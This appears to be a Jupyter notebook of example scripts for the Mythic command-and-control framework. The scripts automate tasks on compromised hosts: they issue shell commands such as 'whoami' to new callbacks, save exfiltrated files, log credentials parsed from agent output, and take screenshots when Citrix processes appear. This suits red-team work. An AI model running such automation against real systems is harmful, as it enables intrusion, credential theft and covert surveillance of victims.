In [2]:
from mythic import mythic

In [3]:
mythic_instance = await mythic.login(
        username="mythic_admin",
        password="mythic_password",
        server_ip="mythic_nginx",
        server_port=7443,
        timeout=-1
    )

In [ ]:
# ########## On new callback issue task ###########
async for callbacks in mythic.subscribe_new_callbacks(mythic=mythic_instance, batch_size=10):
    print(callbacks)  # array based on batch size for how many to return at once
    for callback in callbacks:
        status = await mythic.issue_task(
            mythic=mythic_instance,
            command_name="shell",
            parameters={"command": "whoami"},
            callback_display_id=callback["display_id"],
            wait_for_complete=False,
        )
        print(f"Issued a task: {status}")

In [ ]:
# ########## On file download, fetch file and write to disk ###########
async for result in mythic.subscribe_all_downloaded_files(mythic=mythic_instance, batch_size=1):
    for completed_file in result:
        file_bytes = await mythic.download_file(mythic=mythic_instance, file_uuid=completed_file["agent_file_id"])
        with open(f"{completed_file['filename_utf8']}-{completed_file['agent_file_id']}", 'wb') as f:
            f.write(file_bytes)

In [ ]:
# ########## On agent checking in, log information about it ###########
agent_checkin_subscription = """
    subscription agentCheckedIn($now: timestamp!, $batch_size: Int!){
        callback_stream(cursor: {initial_value: {last_checkin: $now}}, batch_size: $batch_size) {
            id
            agent_callback_id
            display_id
            last_checkin
            host
            domain
            ip
        }
    }
    """
    async for callbacks in mythic.subscribe_custom_query(mythic=mythic_instance, query=agent_checkin_subscription,
                                                         variables={"now": str(datetime.utcnow()), "batch_size": 10}):
        print(callbacks)

In [ ]:
# ########## On agent output, check if it's a certain command and parse the output to register credentials ###########
async for responses in mythic.subscribe_all_task_output(mythic=mythic_instance):
    for response in responses:
        if response["task"]["command_name"] == "my special command":
            data = base64.b64decode(response["response_text"]).decode()
            await mythic.create_credential(mythic=mythic_instance, credential=data, realm="parsed realm", account="associated account", comment="auto populated from scripting")

In [4]:
# ########## Stream processes and take actions on certain ones ###########
async for processes in mythic.subscribe_all_processes(mythic=mythic_instance, batch_size=20,
                                                          custom_return_attributes="""
                                                            task {
                                                                id
                                                                display_id
                                                                callback {
                                                                    display_id
                                                                    host
                                                                }
                                                            }
                                                            timestamp
                                                            host
                                                            comment
                                                            os
                                                            name_text
                                                            parent_path_text
                                                            full_path_text
                                                            metadata
                                                          """):
    for process in processes:
        #print(process)
        if process["metadata"]["name"] == "citrix":
            try:
                new_task = await mythic.issue_task(mythic=mythic_instance, command_name="screencapture",
                                                   parameters="",
                                                   callback_display_id=process["task"]["callback"]["display_id"])
                print(new_task)
            except Exception as e:
                print(e)